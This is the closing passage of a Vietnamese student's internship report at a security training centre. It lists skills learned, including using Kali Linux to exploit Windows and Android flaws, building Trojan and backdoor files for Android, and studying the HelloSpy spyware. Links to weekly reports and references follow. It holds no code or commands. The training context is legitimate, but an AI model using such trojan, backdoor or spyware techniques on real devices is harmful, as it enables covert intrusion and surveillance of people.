Những kỹ năng thực hành đã được học thêm:

- Thực hiện cài đặt Android trên máy ảo

- Cài đặt Kali Linux, sử dụng nó để hack vào các lỗ hổng bảo mật của Windows và Android

- Thi lấy chứng chỉ System Hacking của trung tâm Athena

- Thực hiện sửa đổi, tạo ra các file Trojan, Backdoor sau đó cài đặt vào Android

- Tìm hiều thêm về HelloSpy

Những kinh nghiệm thực tiễn đã tích lũy được:

- Qua gần 2 tháng thực tập, bản thân em đã đúc kết được nhiều kinh nghiệm quý báu, thứ

nhất đó là các kĩ năng về chuyên môn, em đã được học và cũng cố các kiến thức mới bên cạnh các

kiến thức nền tảng. Hơn đó nữa là quá trình thực tập trong môi trường doanh nghiệp đã cho em làm

quen dần để không bỡ ngỡ trong quá trình đi làm sau này, thông qua các kĩ năng giao tiếp và ứng

xử.

- Em cũng nâng cao được khả năng thuyết trình, trình bài của mình thông qua các bài báo

cáo hàng tuần bằng video clip.

- Em cũng rèn luyện được kỹ năng làm việc nhóm khi cùng các bạn thảo luận, bàn bạc cũng

như phân chia công việc để hoàn thành đề tài một cách tốt nhất.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 87

9. Các link báo báo Báo cáo tuần 1:

- Link slideshare: http://www.slideshare.net/tuankiet123/bo-co-tun-1-37178388

- Link youtube: https://www.youtube.com/watch?v=jW8KlSIm82w

Báo cáo tuần 2:

- Link slideshare: http://www.slideshare.net/tuankiet123/bai-bao-cao-2

- Link youtube: https://www.youtube.com/watch?v=6fnZ06g5y8Y

Báo cáo tuần 3:

- Link slideshare: http://www.slideshare.net/tuankiet123/bai-bao-cao-3

- Link youtube: https://www.youtube.com/watch?v=JdV-Y8hev4A

Báo cái tuần 4:

- Link slideshare: http://www.slideshare.net/tuankiet123/bai-bao-cao-4

- Link youtube: https://www.youtube.com/watch?v=ieTT4D04cao

Báo cáo giữa kì:

- Link slideshare: http://www.slideshare.net/tuankiet123/bo-co-gia-k-38036034

Giới thiệu bản thân:

- Link youtube: https://www.youtube.com/watch?v=v8VvL3RCAKY

Thuận lợi – khó khăn:

- Link youtube: https://www.youtube.com/watch?v=XQsUt8uZ1pU

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 88

10. Các link tham khảo

- Tài liệu của Trung tâm Athena

- http://athena.edu.vn/

- http://whitehat.vn/threads/4983-Huong-dan-cai-dat-Kali-linux-backtrack-6.html

- http://www.techrum.vn/threads/huong-dan-su-dung-cac-lenh-adb-co-ban-cua-

android.1202/#.U-7PQ2NEGnF

- http://www.differencebetween.info/difference-between-android-2.3-and-android-4.0

- http://vi.wikipedia.org/wiki/Android

- http://en.wikipedia.org/wiki/Android_version_history

- http://www.quantrimang.com.vn/metasploit-cong-cu-khai-thac-lo-hong-14147

- http://vietbao.vn/Cong-nghe/Huong-dan-cai-dat-phan-mem-Genymotion-gia-lap-he-dieu-

hanh-Android-tot-nhat/2131795280/229/

- http://hellospy.com/homepage.aspx?lang=en-US